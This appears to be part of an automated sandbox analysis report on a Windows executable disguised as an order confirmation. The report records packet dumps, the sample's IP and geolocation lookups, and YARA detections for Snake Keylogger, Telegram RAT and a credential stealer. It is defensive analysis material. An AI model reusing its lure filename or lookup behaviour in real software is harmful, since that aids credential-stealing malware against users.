                                              Apr 12, 2022 20:22:50.173552036 CEST650INData Raw: 36 9e 55 d9 bd 3a 0e db 51 4b e0 62 12 23 7e 0b 97 7d 00 da de 8d 89 d3 6e 20 cb db ec d7 e0 ff 00 00 00 00 00 00 00 00 b8 48 e0 ff 00 00 00 00 00 00 00 00 b8 48 0c 74 08 40 39 49 00 00 00 00 00 00 00 00 b8 48 1f 8b 08 00 00 00 00 00 04 00 e3 0a
                                              Data Ascii: 6U:QKb#~}n HHt@9IHb,)NIb-LJK+,K4bbbb`d\_ZYX`bfjnk`k``dZR]EUH]HUPthgiehhtdiweziS.
                                              Apr 12, 2022 20:22:50.173594952 CEST652INData Raw: 0a 0a 2f 01 00 00 00 1e 06 4d 50 02 00 00 00 1d 06 4d 41 02 00 00 00 1c 06 00 00 00 07 09 01 08 01 01 08 73 67 61 6c 46 74 61 6d 72 6f 46 65 6d 69 54 65 74 61 44 2e 6e 6f 69 74 61 7a 69 6c 61 62 6f 6c 47 2e 6d 65 74 73 79 53 28 01 08 08 08 72 61
                                              Data Ascii: /MPMAsgalFtamroFemiTetaD.noitazilabolG.metsyS(radnelaCnairogerG.noitazilabolG.metsyS&sdroWetad_mradnelaCtluafeDsi_mmetIataDnofnIradnelaCesUbedirrevOresUesu_mDIer
                                              Apr 12, 2022 20:22:50.195760012 CEST653INData Raw: 16 6e 72 65 74 74 61 50 65 76 69 74 61 67 65 4e 72 65 62 6d 75 6e 15 6e 72 65 74 74 61 50 65 76 69 74 61 67 65 4e 79 63 6e 65 72 72 75 63 17 6e 72 65 74 74 61 50 65 76 69 74 69 73 6f 50 79 63 6e 65 72 72 75 63 17 73 74 69 67 69 44 6c 61 6d 69 63
                                              Data Ascii: nrettaPevitageNrebmunnrettaPevitageNycnerrucnrettaPevitisoPycnerrucstigiDlamiceDycnerrucstigiDlamiceDrebmunmetIatad_mstigiDevitanlobmySelliMreplobmyStnecreprotarapeSpuorGtnecreprotarapeSlamiceDtnecreplobmySytinifnIevitagenlobmySyt
                                              Apr 12, 2022 20:22:50.195816994 CEST654INData Raw: 61 72 74 75 65 6e 3d 65 72 75 74 6c 75 43 20 2c 30 2e 30 2e 30 2e 34 3d 6e 6f 69 73 72 65 56 20 2c 6d 65 74 73 79 53 49 00 00 00 02 0c 00 00 00 00 00 00 00 01 ff ff ff ff 00 00 00 01 00 41 01 02 00 02 0b ff ff ff ff ff ff ff ff 00 00 00 00 00 00
                                              Data Ascii: artuen=erutluC ,0.0.0.4=noisreV ,metsySIA
                                              Apr 12, 2022 20:22:50.195856094 CEST656INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Apr 12, 2022 20:22:50.195897102 CEST657INData Raw: 00 24 1c 00 00 0a 66 00 65 00 67 00 61 00 75 00 67 00 6e 00 61 00 4c 00 2e 00 73 00 69 00 68 00 74 00 24 1c 00 00 0a 64 00 65 00 6c 00 62 00 61 00 7a 00 69 00 6c 00 61 00 63 00 6f 00 4c 00 2e 00 73 00 69 00 68 00 74 00 24 22 00 00 09 c7 00 73 00
                                              Data Ascii: $fegaugnaL.siht$delbazilacoL.siht$"sreifidoM.1raBssergorp,dirGwarD.siht$dekcoL.siht$nocI.siht$nocIegraLyarT.
                                              Apr 12, 2022 20:22:50.196381092 CEST659INData Raw: 98 e1 9c a3 40 80 92 b8 61 40 80 91 b1 8b 4c 0c ac db 8a 8d a3 18 09 e0 84 b9 bd a3 6a 04 a3 0c 94 e5 b5 81 a3 40 80 92 b8 61 40 80 91 b0 8b 4c 1c af e6 b6 a8 a3 6a 03 a3 1f c5 fc e6 b5 a3 40 80 92 b8 61 40 80 91 a0 8b 4c 1c 8d c7 bc 99 a3 18 08
                                              Data Ascii: @a@Lj@a@Lj@a@L@a@LL@a@L@a@Lj@a@LL@a@L@a
                                              Apr 12, 2022 20:22:50.196441889 CEST660INData Raw: a3 14 06 95 ec cc ad a3 40 80 92 b8 61 40 80 92 b9 8b 4c 15 9a 8b dc 92 a3 14 15 02 a3 4e 98 f5 a2 a3 40 80 92 b8 61 40 80 92 bc 8b 4c 19 c6 f4 e3 a9 a3 15 02 a3 14 dd a5 80 87 a3 40 80 92 b8 61 40 80 91 b3 8b 4c 0b 95 9e 98 9b a3 18 06 ee bd ab
                                              Data Ascii: @a@LN@a@L@a@L@a@L@a@LL@a@L@a@L@a@L@a@L
                                              Apr 12, 2022 20:22:50.196501970 CEST661INData Raw: a3 6a 04 a3 4c 1c b3 f3 d3 a8 a3 17 9c 84 87 86 a3 40 80 92 b8 61 40 80 92 96 8b 4c 03 c6 b2 be 93 a3 9a 02 a3 a6 8f aa a3 0f d7 d0 cd 96 a3 40 80 92 b8 61 40 80 91 b6 8b 4c 06 9b 8b c9 8c a3 4c 06 83 ed fd bb a3 15 06 a3 0c b3 9a b7 a5 a3 40 80
                                              Data Ascii: jL@a@L@a@LL@a@L@a@L@a@LL@a@L@a@L@a@LL


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.449745193.122.6.16880C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 12, 2022 20:23:21.364192009 CEST2150OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Apr 12, 2022 20:23:21.384188890 CEST2151INHTTP/1.1 200 OK
                                              Date: Tue, 12 Apr 2022 18:23:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 31 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.18</body></html>
                                              Apr 12, 2022 20:23:21.427567005 CEST2151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Apr 12, 2022 20:23:21.446513891 CEST2151INHTTP/1.1 200 OK
                                              Date: Tue, 12 Apr 2022 18:23:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 31 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.18</body></html>


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.449746188.114.97.7443C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                                              TimestampkBytes transferredDirectionData
                                              2022-04-12 18:23:24 UTC0OUTGET /xml/84.17.52.18 HTTP/1.1
                                              Host: freegeoip.app
                                              Connection: Keep-Alive
                                              2022-04-12 18:23:24 UTC0INHTTP/1.1 200 OK
                                              Date: Tue, 12 Apr 2022 18:23:24 GMT
                                              Content-Type: application/xml
                                              Content-Length: 347
                                              Connection: close
                                              RateLimit-Reset: 2196
                                              X-RateLimit-Limit-Hour: 1200
                                              X-RateLimit-Remaining-Hour: 1188
                                              RateLimit-Limit: 1200
                                              RateLimit-Remaining: 1188
                                              Vary: Origin
                                              vary: Origin
                                              X-Database-Date: Tue, 22 Mar 2022 15:29:43 GMT
                                              Access-Control-Allow-Origin: *
                                              X-Kong-Upstream-Latency: 0
                                              X-Kong-Proxy-Latency: 1
                                              Via: kong/2.5.1
                                              CF-Cache-Status: DYNAMIC
                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYr2B8XEO53%2B6u4wPF3ifVTEIWmIFgefxDCEqPjM0A3qQSKaJfUbL1Ezok48h8trpbzoJLgaRw%2BUSanAJGrZvpJ84Pp8ooNGB6CpUltIKlheltzHxLd71C9YV9poxrWV"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 6fadfe2fde35995d-FRA
                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                              2022-04-12 18:23:24 UTC1INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 34 2e 31 37 2e 35 32 2e 31 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 48 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 53 77 69 74 7a 65 72 6c 61 6e 64 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 5a 48 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 5a 75 72 69 63 68 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 5a 75 72 69 63 68 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 30 34 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74
                                              Data Ascii: <Response><IP>84.17.52.18</IP><CountryCode>CH</CountryCode><CountryName>Switzerland</CountryName><RegionCode>ZH</RegionCode><RegionName>Zurich</RegionName><City>Zurich</City><ZipCode>8042</ZipCode><TimeZone>Europe/Zurich</TimeZone><Latit


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:20:22:40
                                              Start date:12/04/2022
                                              Path:C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe"
                                              Imagebase:0x460000
                                              File size:33280 bytes
                                              MD5 hash:0DA15373EABEDE8F52245EF830D312F9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.343064408.00000000037F2000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.342975236.0000000003791000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low

                                              General

                                              Target ID:12
                                              Start time:20:23:17
                                              Start date:12/04/2022
                                              Path:C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                                              Imagebase:0xa00000
                                              File size:33280 bytes
                                              MD5 hash:0DA15373EABEDE8F52245EF830D312F9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000000.340523862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000000.340127336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000000.339361837.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000002.527594880.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000C.00000000.339756744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low

                                              Disassembly

                                              Reset < >